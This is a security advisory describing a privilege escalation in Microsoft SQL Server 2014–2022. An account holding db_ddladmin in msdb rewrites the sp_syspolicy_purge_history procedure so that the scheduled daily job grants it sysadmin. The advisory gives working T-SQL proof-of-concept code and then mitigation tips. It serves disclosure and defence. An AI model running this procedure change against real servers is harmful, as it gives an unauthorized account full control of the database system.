Microsoft SQL Server db_ddladmin Privilege Escalation

2024.01.14
Credit: Emad Al-Mousa
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

Title: SQL Server Privilege Escalation from db_ddladmin to sysadmin Product: Microsoft SQL Server Affected Version(s): 2014,2016,2017,2019,2022 Tested Version(s): 2014,2016,2017,2019,2022 Risk Level: Medium Author of Advisory: Emad Al-Mousa Overview: Privilege Escalation is a serious security attack that attackers seek to compromise IT infrastructure and systems. attackers will either exploit vulnerabilites or misconfiguration in the system to escalate their permissions and take over the whole system. ***************************************** Vulnerability Details: By design when you install SQL Server database engine a job is created called “syspolicy_purge_history” , and this job by design will run every day. This job can be weaponized for privilege escalation attack. attacker will require to compromise a database account that is added in MSDB system database and is granted db_ddladmin role. ***************************************** Proof of Concept (PoC): I will create a dummy account called “toto” (for the sake of simulation it will be SQL Authenticated account): USE [master] GO CREATE LOGIN [toto] WITH PASSWORD=N'toto', DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF GO And, then I will add the account as database user in system database MSDB with db_ddladmin permission: USE [msdb] GO CREATE USER [toto] FOR LOGIN [toto] GO USE [msdb] GO ALTER ROLE [db_ddladmin] ADD MEMBER [toto] GO Then, I will execute the following modification code against the procedure: USE [msdb] GO ALTER PROCEDURE [dbo].[sp_syspolicy_purge_history] AS BEGIN ALTER SERVER ROLE [sysadmin] ADD MEMBER [toto] END The next scheduled run-time for the job syspolicy_purge_history, the account toto will be escalated to SYSADMIN role, which means he will he/she will take over the whole SQL Server database system. -***- To protect from such attacks you will need to follow these security tips: Implement in-place auditing for privilege escalation attacks [smart auditing….don’t audit everything as auditing will impose performance overhead] Implement least privilege concept in your environment, do not grant any account extra permissions that can be weaponized for security breach. Strong Identity and account management approach should be in-place, passwords policies are important to make brute force attacks challenging. patch your environments , and follow best security practices. ***************************************** References: https://databasesecurityninja.wordpress.com/2024/01/07/sql-server-privilege-escalation-from-db_ddladmin-to-sysadmin/ https://learn.microsoft.com/en-us/sql/relational-databases/security/authentication-access/database-level-roles?view=sql-server-ver16


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top